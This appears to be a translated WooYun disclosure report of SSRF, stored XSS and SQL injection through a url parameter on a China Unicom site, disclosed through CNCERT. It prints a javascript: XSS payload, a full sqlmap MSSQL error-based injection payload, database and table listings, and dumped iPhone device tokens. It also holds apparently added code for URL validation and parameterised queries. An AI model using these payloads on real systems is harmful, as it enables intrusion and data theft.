
Vulnerability summary

Defect ID: wooyun-2015-0157265

Title: SQL injection / SSRF / XSS bundle on a China Unicom site

Vendor: China Unicom

Author: Sai、

Submitted: 2015-12-03 01:28

Fixed: 2016-01-21 14:10

Published: 2016-01-21 14:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (CNCERT, the national CERT) for handling

Source: http://www.wooyun.org


Vulnerability details

Disclosure status:

2015-12-03: details sent to the vendor, awaiting vendor handling
2015-12-07: vendor confirmed, details disclosed to the vendor only
2015-12-17: details disclosed to core white hats and domain experts
2015-12-27: details disclosed to regular white hats
2016-01-06: details disclosed to intern white hats
2016-01-21: details disclosed to the public

Brief description:

The src of an iframe on the site is set directly from the url parameter without any filtering, which leads straight to SSRF and stored XSS.
The SQL injection was a surprise; I really did not expect the url to be passed into the database.

Detailed description:

Vulnerable URL:
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=

0x01 SSRF
The endpoint takes a url parameter and outputs it into the page.

1.png

From this one can guess there is an SSRF, so I probed manually:
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**

2.png

Guessing weak passwords did not succeed, and brute forcing got nowhere.
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**

3.png

I had planned to scan the internal IP range, but that did not get anywhere either...

0x02 XSS, asking for trouble
Why "asking for trouble"? Look at the code:

4.png

The url value obtained is written directly into the iframe's src without any filtering, so a remote script can be loaded directly, giving a stored XSS. This also explains why the earlier SSRF scan of the internal IP range did not get through.
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=javascript:alert(1)

5.png
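Sections 0x01 and 0x02 share one root cause: the url parameter lands in the iframe src unchecked. The Python below is an added example of how a handler for an endpoint of this shape can validate the parameter before framing it; it is not code from the report or from the affected application. The parameter name url, the allowlist hosts (ads.example.com, cdn.example.com) and the function names are assumptions. One check covers both findings: a scheme allowlist rules out javascript: and data: URIs (the XSS vector), and a host allowlist with an internal-address check rules out arbitrary or internal targets (the SSRF vector).

```python
"""Validate an ad url before it is placed in an iframe src.

Added example, not code from the report or from the affected application.
The parameter name `url`, the allowlist hosts and the function names are assumptions.
"""
import html
import ipaddress
from urllib.parse import urlsplit

# Constructed allowlist of hosts the page is meant to frame.
ALLOWED_AD_HOSTS = {"ads.example.com", "cdn.example.com"}


def is_internal_address(host: str) -> bool:
    """True if `host` is an IP literal outside globally routable space
    (loopback, RFC 1918, link-local, multicast, reserved); False for names."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not an IP literal
    return not ip.is_global


def validate_ad_url(url: str, allowed_hosts=ALLOWED_AD_HOSTS):
    """Return (ok, reason). ok is True only for http(s) URLs whose host is on
    the allowlist. Rejecting every non-http(s) scheme blocks javascript: and
    data: URIs; the host allowlist blocks arbitrary and internal targets."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False, "unparseable URL"  # e.g. a malformed IPv6 literal
    if parts.scheme.lower() not in ("http", "https"):
        return False, "scheme not http(s)"
    host = parts.hostname  # already lower-cased, IPv6 brackets stripped
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"  # user@host forms that confuse parsers
    if is_internal_address(host):
        return False, "internal address"
    if host not in allowed_hosts:
        return False, "host not allowlisted"
    return True, "ok"


def render_ad_frame(url: str) -> str:
    """Emit the iframe. A rejected url falls back to about:blank, and the
    attribute value is always HTML-escaped so it cannot break out of src="..."."""
    ok, _reason = validate_ad_url(url)
    src = url.strip() if ok else "about:blank"
    return '<iframe src="%s"></iframe>' % html.escape(src, quote=True)


if __name__ == "__main__":
    for sample in ("javascript:alert(1)", "http://127.0.0.1:7301/",
                   "https://ads.example.com/banner?id=1"):
        print(sample, "->", validate_ad_url(sample), render_ad_frame(sample))
```

The IP-literal check is defence in depth only: a hostname that resolves to an internal address is caught by the allowlist, not by is_internal_address, so the allowlist is the control that matters, and the attribute escaping is what keeps a value such as one containing a double quote from closing the src attribute early.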


0x03 SQL injection
The backend logic here is bizarre: 8 databases.
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] flyds
[*] flylog
[*] gzydkhd
[*] master
[*] model
[*] msdb
[*] out_system_interface
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wolegou
[*] yiquantong
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[38 tables]
+------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
+------------------------+
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[112 tables]
+---------------------------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
| o_wap_actives |
| o_yhq_detail |
| o_youhuiquan |
| q_custom_service |
| q_kaquan |
| q_kaquan_corpaddr |
| q_kaquan_log |
| q_kaquan_type3_goodsrange |
| q_lingquan |
| s_admin |
| s_cache_server |
| s_dev |
| s_role |
| s_stat_day |
| s_stat_day_city |
| s_stat_month |
| s_sysid |
| s_sysval |
| t_commis_requisition |
| t_commis_top |
| t_commis_top_month |
| t_commission |
| t_commission_not_accomplish |
| t_goodsinfo_raw |
| t_record |
| t_request_commis |
| t_session_unique |
| t_session_unique_20150116_1200 |
| t_session_unique_20150116_1230 |
| t_session_unique_20150116_1230_haoduan |
| t_session_unique_20150116_1230_with_haoduan |
| t_session_unique_back |
| t_session_unique_custom_rate |
| t_session_unique_sta |
| t_taobaok |
| t_valueadd_log |
| t_valueadd_set |
| t_youhuiquan_log |
| t_zfb_trade |
| t_zhecocode |
| test_mobile |
| u_black |
| u_business |
| u_favorites |
| u_fee |
| u_user |
| u_user_back_at_20130922_1400 |
| u_user_stop |
| u_user_stop_back_at_20141128 |
| u_userval |
| user_address |
| uyghur_addr |
| uyghur_citylist |
| uyghur_deliverfee_dict |
| uyghur_gooods |
| uyghur_gooodssuit |
| uyghur_order |
| uyghur_ordergoodsdetail |
| v_custom_list |
| v_custom_page |
| v_daijinquan |
| v_daijinquan_log |
| v_home |
| v_home_yd |
| v_iptv |
| v_shop |
| v_taobaok |
| v_taobaok_bak20131101 |
| y_activity_comment |
| y_activity_list |
| y_like_yd |
| y_share_yd |
| y_suggest_yd |
| y_workorder |
+---------------------------------------------+
back-end DBMS: Microsoft SQL Server 2008
Database: flylog
Table: _not_used_m_iphone
[758 entries]
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| id | sIp | badge | tLastPush | tRegister | sLastPush | tUnregister | devicetoken |
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| 100 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e726450d0d34128e6fb9d956d269fcbd682022e4c8e2e9414316c2379a6b33cd |
| 101 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fcc1e3b8bafd6058a9972eae099fcd78a98ecd3554d5d824903ac4e4aeda4fd4 |
| 102 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 493278af966704d5d81570eac3a899779d5b1eda3899d50dacc30011d2286ebc |
| 103 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c0ce0172fb7a7a3b5e04c7a457db0bd6230cd7df5734364c218aaaf5f4065b1e |
| 104 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ceea7be233dc888b1207d6382a4ab176e23c286db1be8d14b7461d54b1b5f579 |
| 105 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2836a37b5a3c2e6a5d5efbf973ff5d337bd3bf6864c06e23d547116b065dbcb7 |
| 106 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4c51b1e211ebc08007d1df73f19cdf5125390314e7452fec9c12d281f6497945 |
| 107 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 9140102a254e5ff671a024688287081b61fb5132fe2ba03f8b21fb3edf5be622 |
| 108 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f40ed6b223a8dcc1c867c3bc0dca00a30017b7b2531f31bcef370c48645e3f1f |
| 109 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 40ed26623523743f04690c4ee100beaa3d2bd579eae152824bc2e47bcf0bb4aa |
| 110 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e1ad42c7efb2ec0c94f1e75f000734e6325fa8541a4e0cd9d36001ce1dfbad44 |
| 111 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | edb7f6d7972bbb0ff38347c7bd5ca4ca00eb728fae440fd38f7e328c537b3adc |
| 112 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | be89d64262431b2972b54bb53632eceb17f414e34c2db4fa6bc3308a3aca6731 |
| 113 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2f20bf3de0b7e70beca46a748f8d5de3d5fb3186652671d95ec64119da8c010b |
| 114 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d40f4c4f85a561f4cfac32fa56c9a5cb0c71d5ec92d11a3be0d17f8f7b3ecc9f |
| 115 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2a247bcb8b599f371b1b28dfbb86478fb920cc1a75742d58dddf2c2565d97037 |
| 117 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 8c966a96701a212f5757130361a8b65a7e16c8a488028f70980e8c9c49a0166f |
| 118 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4102a679cd104719716032ca225157581b605a9fd74b8b42308cb645b9528705 |
| 119 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 16e8af7ee1e7e3a43762547eacb6dceb2b77f0fc5ec09de057b49a66a05458ba |
| 120 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 6e0105fddc7738de5edb52852a4fab9b5bc865bec0fa466b7de660a77fc33eac |
| 121 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4fec62808d00f76eadb13056e5a59dba9f473375772c27301e5741793b425a0f |
| 122 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 89017e1fbed8fecc877b00cd846e12964be3ddde51e647b6fe6d892a8434fce2 |
| 123 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7a4d16c28e748ec82e95f79e6f9282d0ef9482eb30887036bde52529568b4043 |
| 124 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c4f52ee1a6e30d0288fad7a4de0594fc76bb4a376fad7747f0c53ed33084e45e |
| 125 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 0fc3dd96613edc091bca9e36f54a1b946227550f56162782ecc2a9947278df88 |
| 126 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f7586bd4862d28f8eeb03cecce218bcebf49f5df7c0d63cf0162c0c957b54aed |
| 127 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4739c32f31b029cd0055de74aa66cffc02c90125396df40290721d1ef693ef7c |
| 128 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b8bc9a0f3d19f12f4eee958b5c81ab840da011ecc3d634c4efc48f746c0c2e92 |
| 129 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4b0a1e24c161b4693c342f7388203835253b80c278af2185ee0958005a75378f |
| 130 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 3251865b204e6fb81ad5598df05d793da2de219c5bbd94a664b856a3a71fd999 |
| 131 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 02d935e27e9f9e5328c55f52d5b196dfcb0b4e4698eca6ed9795933a0a3c5688 |
| 132 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 5a5cc41a175d1c2cb8f0fc75b082ca37dfc2b2dd0b9c991d1718167668c63745 |
| 133 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ea2569cd04010302b7125172879986f9ca92022164d8efaad8849c0151d49820 |
| 134 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 997d1d8bcd4aed26e16dd88a994158997e507fa0481531d7f76782456ad965a8 |
| 135 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a5d1027cacd386709a518a7ed379497c96125ad5ac7f2e675279715b24f08947 |
| 136 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e866f54f61c3f9466605f7e99697592893027fbc84722d47bc6c99f003d30351 |
| 137 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a053ce6e2e7ac7f1623701d67814a4e47eca7f9a9a8d4ba45ef3ea2b0ca97e84 |
| 138 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d4ddb2218b250d6cd758c362271b773d047cdb0b62eb8c7b618b149cac34676e |
| 139 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fced64bdaf2cc4ba07ee34b997288246e10e39a27a3f909f6ff452be0cbe9b8f |
| 140 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 151b9bcbceffed0e305797dbbcfab3a26210b8e0e9242b2c2f079ae02f978fbf |
| 141 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f840c2657e316fbf4b81e9a5c53076e957187832da704406c01e698454b584fd |
| 142 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | da67ae2ffa13c2960eb812b4c1610f00dcdb86f716688760b33b179dd3a58e6a |
| 143 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c75e539cd54f1d0a703d8c726ebb6221b3b8f133f7362c739784fa11121479cb |
| 144 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 91615fbb768abeb74b50d572d2abb9116eb2f0f25df3555b58c593b4b04386ff |
| 145 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4726d812ecebbfa799c32f931e19351c38eaafb28f65cd34e08e3933f5d84152 |
| 146 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 33d018a27da672cf5fb5b30df706ed4b311df12c3c80516af479e2776401b88d |
| 147 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7cd4753643b55c6254db68a01930fc08eecd01a3cfaeaaca64f7c8e5fee0c618 |
| 148 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ed292fb8eb72c630365b965dd5e4b738e624b07366a59522d1d23b530a2012c3 |
| 149 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a77f04571e6be726c1e0307ab5129474c787f7986c0cb223e60799da5397339d |
| 150 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b2fb63cdedf9d11e751fe5149eb97fec7da36aafa7a2910084f21dd76fdb7187 |

6.png

There is a lot of data, so I did not dump it all.
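The sqlmap output above shows the same url parameter reaching an SQL statement as text, which is why a quote inside it changes the statement. As an added example (not the application's code; the table ad_open_log, the function names and the sample inputs are constructed), the Python below puts the string-spliced INSERT beside the bound-parameter form on an in-memory SQLite database so it runs offline. The fix the report asks for is the second function: the value is bound as data and is never parsed as SQL.

```python
"""String-spliced INSERT beside a parameterised INSERT, on an in-memory SQLite DB.

Added example, not code from the report or the affected application; the table
ad_open_log, the function names and the sample inputs are constructed.
"""
import sqlite3

SCHEMA = "CREATE TABLE ad_open_log (id INTEGER PRIMARY KEY, url TEXT NOT NULL)"


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def log_ad_open_unsafe(conn: sqlite3.Connection, url: str) -> str:
    """Vulnerable pattern: the url is spliced into the statement text, so a quote
    inside it ends the string literal and the remainder is parsed as SQL.
    Returns the statement actually executed so the effect can be inspected."""
    sql = "INSERT INTO ad_open_log (url) VALUES ('%s')" % url
    conn.execute(sql)
    conn.commit()
    return sql


def log_ad_open_safe(conn: sqlite3.Connection, url: str) -> None:
    """Hardened pattern: the url is bound as a parameter and is always data."""
    conn.execute("INSERT INTO ad_open_log (url) VALUES (?)", (url,))
    conn.commit()


def stored_urls(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT url FROM ad_open_log ORDER BY id")]


def compare(url: str) -> tuple:
    """Run the same input through both patterns on fresh databases and return
    (rows stored by the unsafe version, rows stored by the safe version)."""
    unsafe_db, safe_db = new_db(), new_db()
    try:
        log_ad_open_unsafe(unsafe_db, url)
        unsafe_rows = stored_urls(unsafe_db)
    except sqlite3.Error as exc:
        # The spliced text did not parse as SQL: the kind of database error an
        # error-based detection such as the sqlmap run above keys on.
        unsafe_rows = ["<sql error: %s>" % type(exc).__name__]
    log_ad_open_safe(safe_db, url)
    return unsafe_rows, stored_urls(safe_db)


# Constructed inputs: a benign URL, a value with an apostrophe, and a value
# that closes the literal and supplies a second row.
BENIGN = "http://ads.example.com/banner?id=7"
APOSTROPHE = "http://ads.example.com/it's"
QUOTED = "x'), ('injected-row"

if __name__ == "__main__":
    for sample in (BENIGN, APOSTROPHE, QUOTED):
        print(repr(sample), "->", compare(sample))
```

With the benign input both versions store the same row. With the apostrophe the spliced version fails with a database error while the bound version stores the value verbatim; with the third input the spliced version stores two rows where one was intended. Either difference between the two columns is a test a code review or an integration test can check for.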

Proof of vulnerability:

Identical to the detailed description above.

Fix recommendation:

Apply proper filtering at this point.

Copyright notice: please credit the source when reposting, Sai、@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-12-07 14:07

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been passed to CNCERT, which forwarded it to the Guangxi branch centre to coordinate handling with the website's operating unit.

Latest status:

None yet